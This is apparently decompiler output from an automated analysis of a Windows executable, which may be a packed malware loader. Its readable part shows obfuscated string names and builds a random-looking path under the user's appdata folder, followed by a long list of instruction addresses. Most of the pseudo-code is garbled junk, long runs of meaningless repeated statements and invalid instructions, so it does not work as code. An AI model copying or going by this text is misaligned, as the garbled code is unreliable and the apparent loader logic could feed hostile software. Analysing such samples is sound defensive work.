										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										asm("hlt");
										 *__eax =  *__eax + __eax;
										 *((intOrPtr*)(__eax + 0x4021)) =  *((intOrPtr*)(__eax + 0x4021)) + __ah;
										 *__eax =  *__eax + __al;
										__al = __al + __al;
										 *__ecx = 0xb0;
										asm("sbb [edx], al");
										__al = __al & 0x00000012;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax | __ah;
										__edx = __edx + 1;
										 *((intOrPtr*)(__esi + 0x15)) =  *((intOrPtr*)(__esi + 0x15)) + __al;
										__eax = __eax + 1;
										 *__eax =  *__eax + __al;
										 *__edx =  *__edx & __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__ecx = __bl;
										__eax = __eax + 1;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x4021)) =  *((intOrPtr*)(__eax + 0x4021)) + __ah;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__ebx + 0x41 + __eax * 8)) =  *((intOrPtr*)(__ebx + 0x41 + __eax * 8)) + __dh;
										__bh = __bh + __bh;
										asm("invalid");
										 *__eax =  *__eax + 1;
										 *__eax =  *__eax + __al;
										__ah = __ah + __dh;
										 *__eax =  *__eax & __eax;
										 *__eax =  *__eax | __ah;
										__edx = __edx + 1;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x9542)) =  *((intOrPtr*)(__eax + 0x9542)) + __bl;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__edi + __ebx + 0x40)) =  *((intOrPtr*)(__edi + __ebx + 0x40)) + __ah;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __ah;
										__eax = __eax &  *__eax;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										_pop(ds);
										__eax = __eax + 1;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__edi + __ebx + 0x40)) =  *((intOrPtr*)(__edi + __ebx + 0x40)) + __ch;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x1f)) =  *((intOrPtr*)(__eax + 0x1f)) + __ch;
										__eax = __eax + 1;
										 *__ecx =  *__ecx + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__edi + __ebx + 0x40)) =  *((intOrPtr*)(__edi + __ebx + 0x40)) + __ch;
										 *__esi =  *__esi + __dl;
										 *((intOrPtr*)(__edi + 0x6c006801)) =  *((intOrPtr*)(__edi + 0x6c006801)) + __dh;
										 *((intOrPtr*)(__edi + __ebx + 0x2ad00040)) =  *((intOrPtr*)(__edi + __ebx + 0x2ad00040)) + __dl;
										__edx = __edx + 1;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										__ah = __ah + __cl;
										__dl = __dl |  *(__eax + __eax + 0x402330);
										__eax = __eax + 1;
										__eax = __eax &  *__eax;
										__eax = __eax + 1;
										 *__edi =  *__edi + __bl;
										 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __dh;
										 *__eax =  *__eax + __al;
										__eax = __eax &  *__eax;
										asm("invalid");
										asm("invalid");
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										asm("in al, dx");
										ds = __eax;
										__eax = __eax + 1;
										 *((intOrPtr*)(__eax + 0x6000940e)) =  *((intOrPtr*)(__eax + 0x6000940e)) + __bl;
										__eax = __eax &  *__eax;
										asm("invalid");
										asm("invalid");
										__esp = 0xc9004020;
										 *__eax =  *__eax & __al;
										asm("salc");
										 *__eax =  *__eax & __al;
										asm("jecxz 0x22");
										__eax = __eax + 1;
										 *__edx =  *__edx + __cl;
										 *__eax =  *__eax & __eax;
										 *__ecx =  *__ecx ^ 0xc9004020;
										__eax = __eax + 1;
										 *__esi =  *__esi + __bh;
										 *__eax =  *__eax & __eax;
										_pop(__eax);
										 *__eax =  *__eax & __eax;
										 *[gs:eax] =  *[gs:eax] & __eax;
										__eflags =  *[gs:eax];
										if( *[gs:eax] >= 0) {
											__eax = __eax + 1;
											 *((intOrPtr*)(__edi + 0x21)) =  *((intOrPtr*)(__edi + 0x21)) + __bh;
											__eax = __eax + 1;
											 *((intOrPtr*)(__eax - 0x6affbfe0)) =  *((intOrPtr*)(__eax - 0x6affbfe0)) + __cl;
											 *__eax =  *__eax & __al;
											 *0xaf004020 = __al;
											 *__eax =  *__eax & __al;
											asm("lock and [eax], al");
											asm("std");
											 *__eax =  *__eax & __al;
											_pop(ss);
											 *__eax =  *__eax & __eax;
											__eflags =  *__eax;
										}
										 *__ecx =  *__ecx + __ah;
										__eax = __eax + 1;
										 *((intOrPtr*)(__ebx + 0x21)) =  *((intOrPtr*)(__ebx + 0x21)) + __cl;
										__eax = __eax + 1;
										__ecx[0x8664010] = __ecx[0x8664010] + __cl;
										__eax = __eax + 1;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__edi + __ebx + 0x40)) =  *((intOrPtr*)(__edi + __ebx + 0x40)) + __ch;
										__ah = __ah + __ch;
										_push(ds);
										__eax = __eax + 1;
										 *((intOrPtr*)(__eax + 0x18)) =  *((intOrPtr*)(__eax + 0x18)) + __dh;
										__eax = __eax + 1;
										 *((intOrPtr*)(__esi + 0x18)) =  *((intOrPtr*)(__esi + 0x18)) + __dh;
										__eax = __eax + 1;
										 *((intOrPtr*)(__eax + __ebx + 0x40)) =  *((intOrPtr*)(__eax + __ebx + 0x40)) + __bh;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *((intOrPtr*)(__eax + 0x4020)) =  *((intOrPtr*)(__eax + 0x4020)) + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										 *__eax =  *__eax + __al;
										__ecx[0xcc1091b] = __ecx[0xcc1091b] + __al;
										 *__eax =  *__eax + __al;
										__cl = __cl + __ch;
										asm("aaa");
										asm("cmpsb");
										 *__eax =  *__eax + __eax;
										_v12 = _v12 - 0xffff;
										_push(__ebp);
										__ebp = __esp;
										_push(__ecx);
										_push(__ecx);
										_push(0x401546);
										__eax =  *[fs:0x0];
										_push( *[fs:0x0]);
										 *[fs:0x0] = __esp;
										__eax = 0xa0;
										L00401540();
										_push(__ebx);
										_push(__esi);
										_push(__edi);
										_v28 = __esp;
										_v24 = 0x401270;
										_push(L"Scopiformly9");
										_push(L"baadene");
										__eax =  &_v80;
										_push( &_v80); // executed
										L00401732(); // executed
										_v120 = L"Ambulancesagen2";
										_v128 = 0x8008;
										__eax =  &_v80;
										_push( &_v80);
										__eax =  &_v128;
										_push( &_v128);
										L00401738();
										_v168 = __ax;
										__ecx =  &_v80;
										L00401828();
										__eax = _v168;
										__eflags = __eax;
										if(__eax != 0) {
											_push(0x1b);
											_push(L"Reklamekampagne4");
											L00401750();
											__edx = __eax;
											__ecx =  &_v28;
											L0040183A();
											__eflags =  *0x4223c0;
											if( *0x4223c0 != 0) {
												_v172 = 0x4223c0;
											} else {
												_push(0x4223c0);
												_push(0x40259c);
												L004017CE();
												_v172 = 0x4223c0;
											}
											_v172 =  *_v172;
											_v152 =  *_v172;
											__eax =  &_v48;
											__eax = _v152;
											__eax =  *_v152;
											__eax =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
											asm("fclex");
											_v156 = __eax;
											__eflags = _v156;
											if(_v156 >= 0) {
												_t186 =  &_v176;
												 *_t186 = _v176 & 0x00000000;
												__eflags =  *_t186;
											} else {
												_push(0x14);
												_push(0x40258c);
												_push(_v152);
												_push(_v156);
												L004017C8();
												_v176 = __eax;
											}
											__eax = _v48;
											_v160 = _v48;
											__eax =  &_v148;
											__eax = _v160;
											__eax =  *_v160;
											__eax =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
											asm("fclex");
											_v164 = __eax;
											__eflags = _v164;
											if(_v164 >= 0) {
												_t199 =  &_v180;
												 *_t199 = _v180 & 0x00000000;
												__eflags =  *_t199;
											} else {
												_push(0x118);
												_push(0x4025ac);
												_push(_v160);
												_push(_v164);
												L004017C8();
												_v180 = __eax;
											}
											__ax = _v148;
											_v40 = __ax;
											__ecx =  &_v48;
											L004017C2();
										}
										__edx = L"CONTINUATOR";
										__ecx =  &_v36;
										L004017B6();
										_push(0x44);
										_push(_v36);
										L00401750();
										__edx = __eax;
										__ecx =  &_v44;
										L0040183A();
										_push(__eax);
										_push(L"Jordfstedes4");
										L0040172C();
										__eax =  ~__eax;
										asm("sbb eax, eax");
										__eax =  ~__eax;
										_v152 = __ax;
										__ecx =  &_v44;
										L00401846();
										__eax = _v152;
										__eflags = __eax;
										if(__eax != 0) {
											_v104 = L"appdata";
											_v112 = 8;
											__edx =  &_v112;
											__ecx =  &_v64;
											L0040184C();
											__eax =  &_v64;
											_push( &_v64);
											__eax =  &_v80;
											_push( &_v80);
											L0040171A();
											_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
											_v128 = 8;
											__eax =  &_v80;
											_push( &_v80);
											__eax =  &_v128;
											_push( &_v128);
											__eax =  &_v96;
											_push(__eax);
											L00401720();
											_push(__eax);
											L00401834();
											__edx = __eax;
											__ecx =  &_v44;
											L0040183A();
											_push(__eax);
											_push(1);
											_push(0xffffffff);
											_push(0x120);
											L00401726();
											__ecx =  &_v44;
											L00401846();
											__eax =  &_v96;
											_push( &_v96);
											__eax =  &_v80;
											_push( &_v80);
											__eax =  &_v64;
											_push( &_v64);
											_push(3);
											L00401840();
											__esp = __esp + 0x10;
											_push(1);
											__eax =  &_v32;
											_push( &_v32);
											_push(0);
											L00401714();
											_push(1);
											L0040170E();
											_push(0xec);
											__eax =  &_v64;
											_push( &_v64);
											L00401708();
											__eax =  &_v64;
											_push(__eax);
											L00401834();
											__edx = __eax;
											__ecx =  &_v24;
											L0040183A();
											__ecx =  &_v64;
											L00401828();
										}
										_push(0x41e068);
										__ecx =  &_v24;
										L00401846();
										__ecx =  &_v28;
										L00401846();
										__ecx =  &_v32;
										L00401846();
										__ecx =  &_v36;
										L00401846();
										return __eax;
									} else {
										__ebp =  *(__edi + 0x6e) * 0x500073;
										 *__eax =  *__eax + 0x1c;
										__ebp = 0x27d3b3c4;
										asm("sahf");
										__eax = __eax + 1;
										__eflags = __eax;
										__ebp =  *0xFFFFFFFFF77FBFE6;
										 *0xFFFFFFFFF77FBFE6 = 0x27d3b3c4;
										asm("lodsd");
										__cl = __cl &  *(__esp + __ebp * 4);
										asm("iretd");
										asm("das");
										__eflags = 0x1c -  *__eax;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + __dl;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + 0x1c;
										 *__edi =  *__edi + __ch;
										 *__eax =  *__eax + 0x1c;
										__al = __al + __bl;
										asm("sbb [eax], al");
										__esp = __esp - 1;
										 *__eax =  *__eax + 0x1c;
										 *__eax =  *__eax + __dl;
										__eflags =  *__eax;
										goto L25;
									}
								}
							}
						}
					}
				}
				_t17 = __ebx + 0x70;
				 *_t17 =  *(__ebx + 0x70) + __dh;
				__eflags =  *_t17;
				goto L10;
			}

0x00401888
0x0040188d
0x00401892
0x00401894
0x00401896
0x00401898
0x0040189a
0x0040189c
0x0040189d
0x0040189f
0x004018a1
0x004018a3
0x004018a3
0x004018a9
0x0040185e
0x0040185e
0x004018ab
0x004018ac
0x004018ad
0x004018af
0x004018b1
0x004018b1
0x004018b1
0x004018b3
0x004018b3
0x004018b3
0x004018b5
0x004018b7
0x004018b9
0x004018bb
0x004018bd
0x004018bf
0x004018bf
0x004018c0
0x004018c0
0x004018c2
0x004018c2
0x004018c4
0x004018c5
0x004018c6
0x00000000
0x00000000
0x004018c8
0x004018cb
0x004018d2
0x004018d4
0x004018d6
0x004018d8
0x004018da
0x004018dc
0x004018e2
0x004018e3
0x004018e5
0x004018e5
0x004018e5
0x004018eb
0x004018ec
0x004018f2
0x00000000
0x004018f4
0x004018f4
0x004018f4
0x004018f5
0x004018f5
0x004018f5
0x004018f6
0x004018f8
0x004018f8
0x004018f9
0x004018fe
0x004018ff
0x00401900
0x00401908
0x00401909
0x0040190c
0x0040190c
0x0040190c
0x0040190d
0x0040190f
0x00401911
0x00401913
0x00401915
0x00401917
0x00401919
0x0040191b
0x0040191d
0x0040191f
0x00401921
0x00401923
0x00401925
0x00401927
0x00401929
0x0040192b
0x0040192d
0x0040192f
0x00401931
0x00401932
0x00401934
0x00401937
0x00401939
0x00401939
0x00000000
0x00401939
0x004018f2
0x0040193e
0x0040193e
0x0040193f
0x00401941
0x00401942
0x00401943
0x00401949
0x0040194a
0x0040194d
0x0040194e
0x0040194e
0x00401955
0x0040198f
0x0040198f
0x00401991
0x00401993
0x00401999
0x0040199b
0x0040199d
0x0040199f
0x004019a1
0x004019a3
0x004019a5
0x004019a5
0x00401957
0x00401957
0x00401959
0x0040195b
0x0040195c
0x0040195f
0x00401962
0x00401965
0x00401966
0x00401966
0x0040196d
0x0040196f
0x00401975
0x00401976
0x00401979
0x0040197e
0x00401983
0x00401984
0x00401986
0x00401988
0x00401989
0x0040198b
0x0040198b
0x0040198b
0x00000000
0x0040198b
0x0040196d
0x004019a7
0x004019a7
0x004019a7
0x004019a7
0x004019a9
0x004019ac
0x004019ae
0x004019af
0x004019b1
0x004019b3
0x004019b5
0x004019bb
0x004019bd
0x004019bf
0x004019c1
0x004019c3
0x004019c5
0x004019c8
0x004019c9
0x004019ca
0x004019cf
0x004019d1
0x004019d3
0x004019d5
0x004019d7
0x004019d9
0x004019db
0x004019de
0x004019e0
0x004019e2
0x004019e4
0x004019e6
0x004019e8
0x004019ea
0x004019ec
0x004019ee
0x004019f0
0x004019f2
0x004019f4
0x004019f6
0x004019f8
0x004019fa
0x004019fb
0x004019fd
0x00401a00
0x00401a02
0x00401a04
0x00401a06
0x00401a08
0x00401a0a
0x00401a0a
0x00401a0c
0x00401a0e
0x00401a10
0x00401a15
0x00401a18
0x00401a1a
0x00401a1b
0x00401a22
0x00401a22
0x00401a24
0x00401a26
0x00401a28
0x00401a2a
0x00401a2c
0x00401a2e
0x00401a30
0x00401a32
0x00401a34
0x00401a36
0x00401a38
0x00401a3a
0x00401a3c
0x00401a3e
0x00401a3e
0x00401a40
0x00401a41
0x00401a42
0x00401ab0
0x00401ab0
0x00401ab1
0x00401ab3
0x00401ab3
0x00401ab9
0x00401aba
0x00401a45
0x00401a45
0x00401a47
0x00401a48
0x00401a49
0x00401abe
0x00000000
0x00401a4b
0x00401a4b
0x00401ac1
0x00401ac1
0x00401ac2
0x00401ac8
0x00401aca
0x00401aca
0x00000000
0x00401a4e
0x00401a4e
0x00401a4e
0x00401a55
0x00401a56
0x00401acb
0x00401acb
0x00401acd
0x00401acd
0x00000000
0x00401a58
0x00401a58
0x00401ace
0x00401ace
0x00401ad0
0x00401ad2
0x00401ad4
0x00401ad6
0x00401ad8
0x00401adb
0x00401add
0x00401adf
0x00401ae1
0x00401ae3
0x00401ae5
0x00401ae7
0x00401ae9
0x00401aeb
0x00401aed
0x00401aef
0x00401af1
0x00401af3
0x00401af5
0x00401af7
0x00401afe
0x00401b00
0x00401b02
0x00401b04
0x00401b09
0x00401b0b
0x00401b0e
0x00401b0f
0x00401b11
0x00401b13
0x00401b15
0x00401b17
0x00401b1a
0x00401b1b
0x00401b1f
0x00401b21
0x00401b23
0x00401b29
0x00401b2b
0x00401b2d
0x00401b2f
0x00401b31
0x00401b33
0x00401b36
0x00401b37
0x00401b39
0x00401b3b
0x00401b3e
0x00401b3f
0x00401b41
0x00401b43
0x00401b46
0x00401b47
0x00401b49
0x00401b4b
0x00401b51
0x00401b53
0x00401b57
0x00401b59
0x00401b5b
0x00401b61
0x00401b67
0x00401b69
0x00401b6c
0x00401b6d
0x00401b70
0x00401b72
0x00401b72
0x00401b74
0x00401b76
0x00401b76
0x00401b76
0x00401b77
0x00401b7a
0x00401b7b
0x00401b81
0x00401b87
0x00401b8d
0x00401b8f
0x00401b91
0x00401b93
0x00401b95
0x00401b97
0x00401b99
0x00401b99
0x00401b9c
0x00401ba1
0x00401ba3
0x00401ba5
0x00401ba7
0x00401baa
0x00401bab
0x00401bad
0x00401baf
0x00401bb2
0x00401bb3
0x00401bb5
0x00401bb7
0x00401bb9
0x00401bbb
0x00401bbd
0x00401bbf
0x00401bc2
0x00401bc3
0x00401bc9
0x00401bcc
0x00401bce
0x00401bd0
0x00401bd2
0x00401bd4
0x00401bd7
0x00401bd7
0x00401bd9
0x00401bdc
0x00401bde
0x00401bdf
0x00401be2
0x00401be3
0x00401be7
0x00401be9
0x00401beb
0x00401bed
0x00401bef
0x00401bf1
0x00401bf3
0x00401bf5
0x00401bf5
0x00401bf5
0x00401bf6
0x00401bf8
0x00401bfa
0x00401bfc
0x00401bfe
0x00401c00
0x00401c02
0x00401c04
0x00401c06
0x00401c08
0x00401c0a
0x00401c0c
0x00401c0e
0x00401c10
0x00401c12
0x00401c14
0x00401c16
0x00401c18
0x00401c1a
0x00401c1c
0x00401c1e
0x00401c20
0x00401c22
0x00401c23
0x00401c23
0x00401c25
0x00401c28
0x00401c2a
0x00401c2b
0x00401c2e
0x00401c2f
0x00401c33
0x00401c35
0x00401c37
0x00401c39
0x00401c3b
0x00401c3d
0x00401c3f
0x00401c41
0x00401c41
0x00401c41
0x00401c42
0x00401c44
0x00401c46
0x00401c48
0x00401c4a
0x00401c4c
